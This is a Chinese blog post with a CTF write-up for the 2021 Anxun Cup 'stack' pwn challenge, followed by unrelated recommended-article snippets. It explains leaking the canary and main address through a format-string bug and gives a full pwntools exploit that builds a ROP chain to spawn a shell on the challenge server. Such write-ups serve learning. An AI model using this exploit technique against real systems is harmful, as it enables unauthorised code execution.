[安洵杯 2021]stack题解

最新推荐文章于 2024-07-06 12:03:33 发布
最新推荐文章于 2024-07-06 12:03:33 发布
阅读量111 收藏
点赞数
分类专栏: pwn 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ctfpwn/article/details/131117196
版权

首先拿到附件先checksec~

保护基本上全开了

ida康康

漏洞非常明显,格式化字符串加栈溢出

那么思路就是先通过格式化字符串泄露canary和函数真实地址,然后栈溢出返回shell

 

 

甚至给了后门,他真的,我哭死。

然后就是调试

 

 下断点在printf,运行,再输入一串%p

然后看栈

 他甚至连canary都放的这么明显(0x7fffffffdf08)

而且canary往下第六个参数存放了main函数的地址(0x7fffffffdf28)

所以输入的格式化字符串为%11$p和%17$p(记得前六个参数存放在寄存器里)输入到第一个read中

 泄露代码如下

payload = '%17$p'+'%11$p'
io.sendline(payload)
addr = int(io.recv(14).decode(),16)
canary = int(io.recvuntil("00"),16)

然后在下一个read中根据main函数基址算偏移泄露其他部分构造rop链即可。

完整exp如下:

from pwn import*
io = remote('node4.anna.nssctf.cn',28459)
#io = process('./ezstack')
context.log_level = 'debug'
payload = '%17$p'+'%11$p'
elf = ELF('./ezstack')
io.sendline(payload)
addr = int(io.recv(14).decode(),16)
addrx = hex(addr)
print('main:')
print(addrx)
canary = int(io.recvuntil("00"),16)
canaryn = hex(canary)
print('canary:')
print(canaryn)
binsh = 0xb24
system = elf.sym['system']
main = 0x9dc
pro_base = addr-main
binsh_addr = pro_base + binsh
sys_addr = pro_base + system
binshn = hex(binsh_addr)
systema = hex(sys_addr)
rdi = pro_base + 0xb03//用Ropgadget找
ret = pro_base + 0x7c1
print(binshn)
print(systema)
payload2 = b'a'*(0x20-8)+p64(canary)+b'a'*8+p64(ret)+p64(rdi)+p64(binsh_addr)+p64(sys_addr)//记得用ret和ret_rdi传参
io.sendlineafter('--+--\n',payload2)
io.interactive()

成功getshell

希望对各位有所帮助

rbp
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2021年第四届安洵WriteUp(转)
渗透测试研究中心
12-22 557
0x00 Misc一、应该算是签到快去BV1ZX4y1V7Qb找一条全部由字母和下划线构成的特色flag弹幕吧!flag格式为D0g3{xxxxxxx_xx_xxxxxxxxx} 访问视频半天没找到flag,眼看几分钟都十几解了,我想到了村霸的一句名言:钓不到鱼我就用抽水机来抽(直接用jjdown下载该视频的XML弹幕文件,然后直接搜索D0g3D0g3{welcome_to_axbgogogo}...
2021年第四届“安洵”网络安全挑战赛Writeup
Le1a's Blog
11-28 8225
Misc 应该算是签到 B站搜索直接搜索这个BV号 PS:出题人品味不错,我也喜欢酷玩的这首《Yellow》 直接页面Ctrl+F没找出来 搜索引擎找一下有没有通过API查弹幕的方法:https://www.bilibili.com/read/cv7923601 F12点击Network,找到这个视频的cid 从当前时间2021-11-27开始往前找 https://api.bilibili.com/x/v2/dm/web/history/seg.so?type=1&oid=40043856
np.stack()函数详解
weixin_44201525的博客
11-18 6万+
np.stack()中axis参数的深入理解 看了一下大家关于np.stack()的理解,我感觉自己还是一知半解,有点蒙。自己又想把这个函数真正的理解 ,于是花了一点时间终于对这个函数有了自己的理解,决定把自己的想法写下来与大家分享,希望对大家有帮助。 stack为堆叠的意思,这个函数主要有两个参数,第一个是需要堆叠的多个数组,采用列表的形式输入,例如:np.stack([arrays.array2,array3],axis=0)。第二个参数是axis,这个参数表示从哪一个维度进行堆叠以及堆叠的内容,这个维
c++ stack用法详解
热门推荐
斯文~
07-30 7万+
c++ set用法详解 stack 栈是基本的数据结构之一,特点是先进后出,就如开进死胡同的车队,先进去的只能最后出来. 在c++ 中,stack的头文件是#include<stack> stack常用操作 stack<int> q; //以int型为例 int x; q.push(x); //将x压入栈顶 q.top(); //返回栈顶的元素 q.pop(); //删除栈顶的元素 q.size(); //返回栈中元素的个数 q.empty(); //检查栈是否为空,若
LeetCode-有效的括号【使用Stack栈解决的题解
小名同学
04-15 4万+
题目: 给定一个只包括 ‘(’,’)’,’{’,’}’,’[’,’]’ 的字符串,判断字符串是否有效。 有效字符串需满足: 左括号必须用相同类型的右括号闭合。 左括号必须以正确的顺序闭合。 注意空字符串可被认为是有效字符串。 解题思路: 将左括号存入stack中 用右侧括号对比栈顶的左括号是否匹配 pop出的栈顶元素(即左侧括号)与map中右侧括号是否匹配 栈中存放的是左括号,若pop空,则...
Redis-stack 初体验
c_zyer的博客
03-31 7554
Redis-stack Docker部署
Android中添加CallStack
Flying snow
11-15 4869
(1)Java中添加 Java中添加callstack常见以下几种方式。 import android.util.Log; //(1) Exception e = new Exception("this is a log"); e.printStackTrace(); //(2) Thread.currentThread().getStackTrace(); //(3) Log.e("dump_test" , Log.getStackTraceString(new Throwable())); (2
stack容器的使用
wherewegogo的博客
03-30 3602
stack容器 stack是堆栈容器,是一种“先进后出”的容器。stack是基于deque容器而实现的容器。 使用 #include<stack>//头文件 stack对象的默认构造 stack采用模板类实现, stack对象的默认构造形式: stack stkT; stack<int> stkint; stack<float> stkfloat; stack<string> stkstr; 也可以设置指针类型或者自定义的结构体类型。 出栈和入栈操作 st
Java 栈 stack方法总结
renxingzhadan的专栏
06-30 1万+
前言 最近开始在重新刷leetcode,发现之前刷过的很多算法题现在又陆陆续续忘记了。真是应了那句话,面试造火箭,进去拧螺丝。刷了几道在贪心算法中使用stack来完成的。就重新总结下栈Stack的方法。 Stack和Collection的关系 Stack来自于Vector,那么显然stack的底层实现是数组。 Stack的方法 1. java中Stack只有一个无参构造函数。 2. 属于stack自己的方法包括 push( num) //入栈 pop() //栈顶元素出栈 empty() /
Flutter 相对布局之Stack
yechaoa
08-12 5004
效果 简介 相对布局,类似于android中的RelativeLayout、FrameLayout。 既可以相对父容器确定自己的位置,也可以多个widget重叠显示。 Stack与Positioned搭配使用。 源码 Stack Stack({ Key key, this.alignment = AlignmentDirectional.topStart, this....
java-leetcode面试题解Stack之第232题用栈实现队列-题解.zip
05-05
题解聚焦于LeetCode中的第232题——"用栈实现队列",这是一个常见的数据结构问题,尤其在面试中常常被问到,因为它考察了对栈(Stack)和队列(Queue)基本概念的理解以及如何创造性地运用它们。 首先,我们来...
C语言头文件 STACK
06-13
C语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 ...
FullStack2021
03-26
"FullStack2021"很可能是一个关于2021年全栈开发的学习资源集合,旨在帮助开发者提升在该领域的专业能力。其中,"JavaScript"作为标签,表明这个压缩包中的内容可能主要关注JavaScript在全栈开发中的应用。 ...
Fullstack-2021
03-20
在这个以“Fullstack-2021”为主题的压缩包中,我们将会探讨2021年全栈开发领域的关键知识点,尤其是与JavaScript相关的技术。 **JavaScript:全栈开发的核心** JavaScript,作为Web开发的基石,是全栈开发者必备...
FullStack2021k
02-12
全栈2021年 Kurssisivu:
Ansys Zemax|场曲跟畸变图的前世今生
ueotek的博客
07-02 382
这里的y和z坐标和方向余弦是(Hx, Hy, Px, Py)=(X, X, 0 ,0)和(Hx, Hy, Px, Py)=(X, X, 0 ,0.001),在光线追迹像面的前一个平面的 z坐标和方向余弦。OpticStudio通过在X和Y方向(弧矢和子午方向)的傍轴光线追踪确定近轴图像平面的Z坐标,并测量该近轴焦平面与系统图像平面的Z坐标之间的距离。使用附件中的样本文件,近轴像面的全局Z坐标与视场0处的像面位置之差与场曲和畸变图中的的Tan Shift相同。近轴像面的定义是以下两个光线交点的全局Z坐标。
10.javaSE基础_JDBC编译程序(Driver+Statement+Connection+mysql数据库连接)
m0_61086522的博客
07-02 1213
JDBC是的缩写。它是Sun的Javasoft公司制定的Java数据库连接技术,是一套标准接口java.sql包中提供了JDBC API,通过它连接到各种数据库系统,编写访问数据库的程序。JDBC API不能直接访问数据库,它依赖于数据库厂商提供的JDBC Driver(JDBC驱动程序)
使用Python实现深度学习模型:序列建模与生成模型的博客教程
Echo_Wish的博客
07-02 1050
本文介绍了使用Python实现深度学习模型的序列建模和生成模型的步骤。我们详细说明了每个步骤,并提供了相应的代码示例。通过学习本文,您将能够使用Python构建和训练序列建模和生成模型,并生成新的序列数据。希望本文对您有所帮助!如果您有任何问题或建议,请随时提出。
Python进阶】函数的扩展
最新发布
weixin_52854743的博客
07-06 542
python函数的补充,包括函数的嵌套调用、函数的变量作用域、多种参数、拆包和交换变量值、引用和匿名函数
22运用Docker-Stack部署远程卷挂载lnmp网站PPT文档.pptx
11-14
本文主要描述了使用Docker-Stack部署远程卷挂载lnmp网站PPT文档.pptx的过程。此项目是广州白云工商技师学院云计算和大数据人才培养规划教材《容器技术实战》计算机网络教研室提出的项目任务,旨在通过运用Docker-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值